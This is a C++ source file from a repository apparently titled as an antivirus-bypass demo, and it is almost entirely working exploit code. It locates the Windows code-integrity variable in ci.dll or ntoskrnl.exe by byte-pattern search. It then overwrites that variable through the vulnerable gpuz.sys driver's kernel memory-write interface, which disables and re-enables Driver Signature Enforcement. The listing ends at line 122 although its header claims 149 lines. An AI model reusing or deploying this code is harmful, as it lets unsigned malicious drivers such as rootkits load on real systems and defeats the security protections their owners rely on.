/R0Bypass/GPUZ/GPUZ/sys.cpp

https://github.com/huoji120/Antivirus_R3_bypass_demo · C++ · 149 lines · 115 code · 27 blank · 7 comment · 18 complexity · 7a8274536638ac11d96c33de3ca6308e MD5 · raw file

  1. #include "Global.h"
  2. #define CI_DLL "ci.dll"
  3. #define CI_PATTERN "89 0D ? ? ? ? 49 8B F8"
  4. #define NTOS_EXE "ntoskrnl.exe"
  5. #define NTOS_PATTERN "C6 05 ? ? ? ? ? 8D 7B 06"
  6. /* Initialization Routine */
  7. sys::sys(uint32_t BuildNumber)
  8. : dwBuildNumber(BuildNumber)
  9. {
  10. if (BuildNumber < 7601) // Check if OSBuildNumber Is Supported
  11. throw std::runtime_error("OS Not Supported.");
  12. Driver = new gpuz(); // Initialize gpuz.sys IOCTL functions used for reading/writing System Memory
  13. if (Driver == nullptr)
  14. throw std::runtime_error("gpuz Class Object Is Not Initialized.");
  15. g_CiVar = QueryVar() - 0x100000000; // Query The Global System Variable For Patching
  16. }
  17. /* Call to gpuz.sys to patch the global system variable */
  18. BOOLEAN sys::DisableDSE()
  19. {
  20. std::cout << "Disabling DSE...\n";
  21. int val = dwBuildNumber < 9200 ? 0 : 8; // Get Correct Value To Patch Depending On The OS Version
  22. return Driver->WriteSystemAddress<uint32_t>(g_CiVar, val);
  23. }
  24. /* Call to gpuz.sys to re enable DSE */
  25. BOOLEAN sys::EnableDSE()
  26. {
  27. std::cout << "Enabling DSE...\n";
  28. int val = dwBuildNumber < 9200 ? 1 : 6; // Get Correct Value To Patch Depending On The OS Version
  29. return Driver->WriteSystemAddress<uint32_t>(g_CiVar, val);
  30. }
  31. sys::~sys()
  32. {
  33. Driver->~gpuz();
  34. }
  35. uint64_t sys::QueryVar()
  36. {
  37. uint64_t SystemImageBase = 0;
  38. GetSystemDirectoryA(szSystemPath, MAX_PATH);
  39. strcat_s(szSystemPath, "\\");
  40. /* Initialize Dynamic Data */
  41. if (dwBuildNumber < 9200) // Windows 7
  42. {
  43. ImageName = NTOS_EXE; // Global Variable Is Located In ntoskrnl.exe
  44. VariablePattern = NTOS_PATTERN;
  45. AddressOffset = 7;
  46. }
  47. else // Rest of the supported OS
  48. {
  49. ImageName = CI_DLL; // Global Variable Is Located In CI.dll
  50. VariablePattern = CI_PATTERN;
  51. AddressOffset = 6;
  52. }
  53. strcat_s(szSystemPath, ImageName);
  54. HMODULE MappedImage = LoadLibraryExA(szSystemPath, NULL, DONT_RESOLVE_DLL_REFERENCES); // Load the system module to memory
  55. if (!MappedImage)
  56. throw std::runtime_error("Cannot Load System Image.");
  57. if (!GetModuleInformation(GetCurrentProcess(), MappedImage, &ModInfo, sizeof(ModInfo))) // Get Information About It
  58. throw std::runtime_error("Could Not Get Module Information.");
  59. auto& utils = Utils::instance();
  60. uint64_t varAddress = utils.FindPattern((uint64_t)ModInfo.lpBaseOfDll, ModInfo.SizeOfImage, VariablePattern, 0); // Pattern Search For The OS Specified Variable
  61. if (!varAddress)
  62. throw std::runtime_error("Could Not Find System Module Address.");
  63. uint32_t relative = *(uint32_t*)(varAddress + 2); // Dereference the relative offset
  64. FreeModule(MappedImage);
  65. uint64_t g_CiVar = varAddress + relative + AddressOffset; // GlobalVar = FoundAddress + relative + OSSpecifiedAddressOffset
  66. g_CiVar -= (uint64_t)ModInfo.lpBaseOfDll; // GlobalVarAddress - MappedSystemModuleBaseAddress = GlobalVarOffsetFromModuleBase
  67. if (!GetSystemImageInformation(ImageName, &SystemImageBase)) // Get System Module Base Loaded By The OS
  68. throw std::runtime_error("Could Not Get System Image Information.");
  69. g_CiVar += SystemImageBase; // Add its BaseAddress To GlobalVarOffset
  70. return g_CiVar;
  71. }
  72. /* Queries OS Loaded System Modules */
  73. BOOLEAN sys::GetSystemImageInformation(const char* SystemModuleName, uint64_t* ImageBase)
  74. {
  75. PRTL_PROCESS_MODULES pModInfo = (PRTL_PROCESS_MODULES)GetSystemInformation((SYSTEM_INFORMATION_CLASS)11); // Query System Module Information
  76. int i = pModInfo->NumberOfModules - 1;
  77. if (pModInfo)
  78. {
  79. auto& utils = Utils::instance();
  80. /* Iterate System Module For Desired Module And Return Its ImageBase */
  81. for (; i != -1; --i)
  82. {
  83. RTL_PROCESS_MODULE_INFORMATION entry = pModInfo->Modules[i];
  84. char* ImageName = utils.ToLower((char*)&entry.FullPathName[entry.OffsetToFileName]);
  85. BOOLEAN Found = !strcmp(ImageName, SystemModuleName)
  86. || !strcmp((char*)&entry.FullPathName[entry.OffsetToFileName], SystemModuleName);
  87. free(ImageName);
  88. if (Found)
  89. {
  90. *ImageBase = (uint64_t)entry.ImageBase;
  91. break;
  92. }
  93. }
  94. }
  95. VirtualFree(pModInfo, 0, MEM_RELEASE);
  96. return i != -1;
  97. }
  98. /* Call To Native QuerySystemInformation To Get SystemModuleInformation */
  99. PVOID sys::GetSystemInformation(SYSTEM_INFORMATION_CLASS InfoClass)
  100. {
  101. ULONG RetLen = 0;
  102. NTSTATUS status = NtQuerySystemInformation(InfoClass, NULL, 0, &RetLen);
  103. if (status != STATUS_INFO_LENGTH_MISMATCH)
  104. {
  105. std::cout << "Status: " << std::hex << status << std::endl;
  106. return 0;
  107. }
  108. PVOID pBuffer = VirtualAlloc(NULL, RetLen, MEM_COMMIT, PAGE_READWRITE);
  109. if (!pBuffer)
  110. {
  111. std::cout << "Could not allocate buffer\n";
  112. return 0;
  113. }
  114. status = NtQuerySystemInformation(InfoClass, pBuffer, RetLen, &RetLen);
  115. if (!NT_SUCCESS(status))
  116. {
  117. std::cout << "Could not query info. Status: " << std::hex << status << std::endl;
  118. VirtualFree(pBuffer, 0, MEM_RELEASE);
  119. return 0;
  120. }
  121. return pBuffer;
  122. }